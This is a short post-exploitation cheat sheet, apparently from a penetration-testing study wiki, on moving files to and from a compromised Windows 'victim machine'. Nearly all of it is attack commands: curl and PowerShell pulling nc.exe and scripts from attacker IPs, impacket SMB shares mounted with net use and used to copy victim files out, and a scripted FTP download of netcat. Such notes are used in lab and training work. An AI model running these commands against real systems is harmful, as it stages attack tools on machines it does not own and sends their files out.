Windows File Transfer
Post

Windows File Transfer

29/01/2023 30/10/2023
shuciran
1

Upload

Netcat execution for windows. From victim machine:

1

curl http://10.10.16.4/nc.exe -o nc.exe

Examples: [[StreamIO#^40a776]]

Network File System through SMB

First create with impacket the server locally on attacker machine:

1

impacket-smbserver shareFolder $(pwd) -smb2support

Then you can access directly to this folder from the file explorer itself, by putting the address on the search bar:

1

\\192.168.119.186\shareFolder

Description If by any chance we get the following error: Description We need to create a share with authentication to mount our share in the victim machine as another NFS:

1

impacket-smbserver shareFolder $(pwd) -smb2support -username shuciran -password shuciran123

Next, to mount it on a NFS on the victim machine we execute the following command:

1

net use x: \\10.10.14.4\shareFolder /user:shuciran shuciran123

Then we can check if the x:\ NFS is mounted:

1

dir x:\

Powershell

1

powershell Invoke-WebRequest -Uri http://10.10.119.207/GetCLSID.ps1 -Outfile GetCLSID.ps1

Download

SMB

To download files from the victim machine all you need to do is to copy within the SMB Shared Folder:

1

copy <file> \\192.168.119.186\shareFolder

Non-Interactive FTP Download

For installation and setup on attack machine please refer to [[FTP Server]] First, we will place a file in our /ftphome directory:

1

kali@kali:~$ sudo cp /usr/share/windows-resources/binaries/nc.exe /ftphome/

We have already installed and configured Pure-FTPd on our Kali machine, but we will restart it to make sure the service is available:

1

kali@kali:~$ sudo systemctl restart pure-ftpd

Next execute following command:

1

echo open 192.168.243.142 21> ftp.txt && echo USER offsec>> ftp.txt && echo password>> ftp.txt && echo bin >> ftp.txt && echo GET nc.exe >> ftp.txt && echo bye >> ftp.txt

Initiate FTP with commands on it:

1

C:\Users\offsec> ftp -v -n -s:ftp.txt

When the ftp command runs, our download should have executed, and a working copy of nc.exe should appear in our current directory:

1
2
3
4
5
6

C:\Users\offsec> ftp -v -n -s:ftp.txt
open 192.168.1.31 21
USER offsec
bin
GET nc.exe
bye
03 File Transfer, Windows - File Transfer
file transfer windows upload windows download